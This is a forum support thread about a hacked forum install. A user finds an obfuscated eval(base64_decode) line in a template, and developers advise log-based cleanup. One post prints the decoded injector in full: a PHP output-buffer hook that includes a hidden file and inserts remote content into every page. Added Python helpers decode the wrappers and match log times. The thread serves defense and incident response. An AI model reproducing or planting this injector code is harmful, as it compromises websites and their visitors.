Joined: Jun 2006
Posts: 197
E
enthusiast
I have these lines in my "Community Introduction Body" on version 7.3.1

Is that 'normal' or someone else put it there?

Thank you

-------------
Code
<?php /**/eval(base64_decode('[base64 payload not preserved]')); ?>
----

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
I'd say that's related to your other issue. It looks to me like you've got a hacker issue. Seems they put it into your community intro, and also into your header template.

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
I'd go through the normal cleanup and audit process at this point. You'd want to check all of your logs for any abnormal activity to try and track down how they are editing those files.

A good place to start is by grabbing the time that one of the hacked files was actually edited, and then scanning your webserver logs for that same time. You should be able to track down if it's a web-based exploit with that method.

If you don't see any matches there, then you can do the same thing with your FTP and domain CP logs.

Last edited by Rick; 09/15/2009 1:39 PM.
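The timestamp correlation described in the post above, as an added example that is not part of the original thread: it lists the web-server requests logged within a window around a file's modification time. It assumes the Apache/nginx common or combined log format; the log lines, addresses, paths and times are constructed sample data.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Timestamp and request fields of the Apache/nginx common/combined log format.
LOG_TIME = re.compile(r"\[(\d{2}/[A-Za-z]{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]")
REQUEST = re.compile(r'"([A-Z]+) (\S+)')


def file_mtime(path):
    """Last-modified time of a file as a timezone-aware UTC datetime."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)


def requests_near(log_lines, modified_at, window_seconds=120):
    """Return (offset_seconds, method, url) for log entries inside the window
    around modified_at, closest first; lines without a timestamp are skipped."""
    window = timedelta(seconds=window_seconds)
    hits = []
    for line in log_lines:
        stamp = LOG_TIME.search(line)
        if not stamp:
            continue
        when = datetime.strptime(stamp.group(1), "%d/%b/%Y:%H:%M:%S %z")
        offset = when - modified_at
        if abs(offset) <= window:
            req = REQUEST.search(line)
            method, url = req.groups() if req else ("?", "?")
            hits.append((int(offset.total_seconds()), method, url))
    return sorted(hits, key=lambda hit: abs(hit[0]))


# Constructed sample data: addresses, paths and times are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Sep/2009:09:14:02 -0400] "GET /forum/ubbthreads.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Sep/2009:09:58:41 -0400] "POST /forum/example-endpoint.php HTTP/1.1" 200 312 "-" "-"',
    '203.0.113.7 - - [15/Sep/2009:09:59:30 -0400] "GET /forum/images/logo.gif HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
    "line without a timestamp",
]
# On a real server: modified_at = file_mtime("/path/to/edited/template")
SAMPLE_MTIME = datetime(2009, 9, 15, 13, 58, 43, tzinfo=timezone.utc)

if __name__ == "__main__":
    for offset, method, url in requests_near(SAMPLE_LOG, SAMPLE_MTIME):
        print(f"{offset:+5d}s  {method:4s} {url}")
```

Whoever wrote the file can also reset its modification time, so compare against `st_ctime` as well and widen the window if the log and filesystem clocks may differ.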
Joined: Jun 2006
Posts: 197
E
enthusiast
Thank you Rick.
I'll start doing that now.

Joined: Jun 2006
Posts: 16,299
Likes: 116
UBB.threads Developer
Just FYI, that decoded (and cleaned) is:
Code
if(function_exists('ob_start') && !isset($GLOBALS['sh_no'])) {
	$GLOBALS['sh_no']=1;

	if(file_exists('/home/imigcom/public_html/enviaMail/admin/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')) {
		include_once('/home/imigcom/public_html/enviaMail/admin/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');

		if(function_exists('gml') && !function_exists('dgobh')) {
			if(!function_exists('gzdecode')) {
				function gzdecode($R20FD65E9C7406034FADC682F06732868) {
					$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
					$R60169CD1C47B7A7A85AB44F884635E41=10;
					$R0D54236DA20594EC13FC81B209733931=0;

					if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) {
						$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
						$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
						$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
					}

					if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) {
						$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}

					if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) {
						$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}

					if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) {
						$R60169CD1C47B7A7A85AB44F884635E41+=2;
					}

					$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));

					if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE) {
						$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
					}

					return $RC4A5B5E310ED4C323E04D72AFAE39F53;
				}
			}

			function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
				Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);

				if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
					return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
				} else {
					return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
				}
			}
			ob_start('dgobh');
		}
	}
}

So you may need to go in and do some cleanup on your site since it looks like they made a few new files...

I'd like to note that the majority of that code relies on the gzdecode function, which isn't added until PHP6... I have a hard enough time trying to find a host that supports PHP5 lol...

A quick Google search (trying to figure out what the global var does) came up with a lot of similar hack posts on various forums (search)


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
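For the cleanup step mentioned in the post above, an added example (not part of the original thread) that finds `eval(base64_decode('...'))` wrappers in template or file text, decodes them without executing anything, and lists the file paths the decoded code refers to so the dropped files can be located. The sample template and its path are constructed for illustration.

```python
import base64
import binascii
import re

# The wrapper seen in the injected template: eval(base64_decode('...')).
WRAPPER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)
# Paths the decoded code tests for or pulls in.
PATH_CALL = re.compile(
    r"(?:(?:include|require)(?:_once)?|file_exists)\s*\(?\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)


def decode_injections(text):
    """Decode every eval(base64_decode('...')) payload in text; nothing is run."""
    decoded = []
    for match in WRAPPER.finditer(text):
        try:
            raw = base64.b64decode(match.group(2))
        except (binascii.Error, ValueError):
            continue  # not valid base64, skip it
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def referenced_paths(php_source):
    """Unique paths named in include/require/file_exists calls, in order."""
    seen = []
    for path in PATH_CALL.findall(php_source):
        if path not in seen:
            seen.append(path)
    return seen


# Constructed sample: a template with one injected line (placeholder path).
SAMPLE_PAYLOAD = (
    "if(file_exists('/home/example/public_html/uploads/style.css.php')){"
    "include_once('/home/example/public_html/uploads/style.css.php');}"
)
SAMPLE_TEMPLATE = (
    "<h1>Welcome</h1>\n<?php /**/eval(base64_decode('"
    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    + "')); ?>\n<p>Intro text</p>"
)

if __name__ == "__main__":
    for source in decode_injections(SAMPLE_TEMPLATE):
        print(referenced_paths(source))
```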
